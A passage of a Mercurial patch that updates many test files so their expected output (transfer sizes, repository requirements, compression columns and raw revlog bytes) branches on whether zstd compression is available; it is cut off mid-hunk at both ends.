searching for changes no changes found $ cd shallow @@ -164,8 +166,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds * (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) + transferred 528 bytes in * seconds * (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default diff --git a/tests/test-remotefilelog-sparse.t b/tests/test-remotefilelog-sparse.t --- a/tests/test-remotefilelog-sparse.t +++ b/tests/test-remotefilelog-sparse.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*/sec) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -73,8 +75,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (*) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) 
searching for changes no changes found updating to branch default diff --git a/tests/test-remotefilelog-tags.t b/tests/test-remotefilelog-tags.t --- a/tests/test-remotefilelog-tags.t +++ b/tests/test-remotefilelog-tags.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.excludepattern=.hgtags streaming all changes - 3 files to transfer, 662 bytes of data - transferred 662 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 662 bytes of data (no-zstd !) + transferred 662 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 665 bytes of data (zstd !) + transferred 665 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -53,6 +53,7 @@ featuresetup-test fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -24,6 +24,7 @@ dotencode exp-revlogv2.2 fncache + revlog-compression-zstd (zstd !) sparserevlog store diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -176,6 +176,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -60,7 +60,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) 
compression-level: default default default $ hg debugformat -v -R up-no-side-data --config format.exp-use-side-data=yes format-variant repo config default @@ -73,7 +74,8 @@ copies-sdc: no no no revlog-v2: no yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-no-side-data --config format.exp-use-side-data=yes > /dev/null @@ -92,7 +94,8 @@ copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-side-data --config format.exp-use-side-data=no format-variant repo config default @@ -105,6 +108,7 @@ copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-side-data --config format.exp-use-side-data=no > /dev/null diff --git a/tests/test-sparse-requirement.t b/tests/test-sparse-requirement.t --- a/tests/test-sparse-requirement.t +++ b/tests/test-sparse-requirement.t @@ -20,6 +20,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -38,6 +39,7 @@ exp-sparse fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -57,6 +59,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-sqlitestore.t b/tests/test-sqlitestore.t --- a/tests/test-sqlitestore.t +++ b/tests/test-sqlitestore.t @@ -17,6 +17,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -31,6 +32,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !) 
fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -49,6 +51,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -62,6 +65,7 @@ exp-sqlite-comp-001=none fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -72,8 +72,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -94,8 +96,10 @@ $ hg -R local-stream book mybook $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/local-stream stream2 streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -64,8 +64,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 8 files to transfer, 827 bytes of data - transferred 827 bytes in * seconds (*) (glob) + 8 files to transfer, 827 bytes of data (no-zstd !) + transferred 827 bytes in * seconds (*) (glob) (no-zstd !) 
+ 8 files to transfer, 846 bytes of data (zstd !) + transferred * bytes in * seconds (* */sec) (glob) (zstd !) updating to branch default 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd local-stream diff --git a/tests/test-stream-bundle-v2.t b/tests/test-stream-bundle-v2.t --- a/tests/test-stream-bundle-v2.t +++ b/tests/test-stream-bundle-v2.t @@ -46,9 +46,11 @@ $ hg bundle -a --type="none-v2;stream=v2" bundle.hg $ hg debugbundle bundle.hg Stream params: {} - stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd !) $ hg debugbundle --spec bundle.hg - none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd !) Test that we can apply the bundle as a stream clone bundle diff --git a/tests/test-treemanifest.t b/tests/test-treemanifest.t --- a/tests/test-treemanifest.t +++ b/tests/test-treemanifest.t @@ -832,7 +832,8 @@ Packed bundle $ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg - writing 5330 bytes for 18 files + writing 5330 bytes for 18 files (no-zstd !) + writing 5400 bytes for 18 files (zstd !) 
bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest $ hg debugbundle --spec repo-packed.hg none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -78,7 +78,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no format-variant repo config default @@ -91,7 +92,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no --color=debug format-variant repo config default @@ -104,7 +106,8 @@ [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) 
[formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugformat -Tjson [ @@ -164,7 +167,8 @@ }, { "config": "zlib", - "default": "zlib", + "default": "zlib", (no-zstd !) + "default": "zstd", (zstd !) "name": "compression", "repo": "zlib" }, @@ -323,7 +327,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no format-variant repo config default @@ -336,7 +341,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no --color=debug format-variant repo config default @@ -349,7 +355,8 @@ [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) 
[formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugupgraderepo repository lacks features recommended by current config options: @@ -1293,7 +1300,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1329,7 +1337,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1368,7 +1377,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zstd zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1413,7 +1423,7 @@ revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1457,7 +1467,7 @@ revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1501,7 +1511,7 @@ revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) 
compression-level: default default default $ cat .hg/requires dotencode diff --git a/tests/test-wireproto-command-rawstorefiledata.t b/tests/test-wireproto-command-rawstorefiledata.t --- a/tests/test-wireproto-command-rawstorefiledata.t +++ b/tests/test-wireproto-command-rawstorefiledata.t @@ -56,14 +56,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 527 + b'totalsize': 527 (no-zstd !) + b'totalsize': 530 (zstd !) }, { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) }, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + 
b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) 
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] @@ -78,14 +81,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 584 + b'totalsize': 584 (no-zstd !) + b'totalsize': 588 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) + b'size': 588 (zstd !) 
}, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + 
b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) 
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde 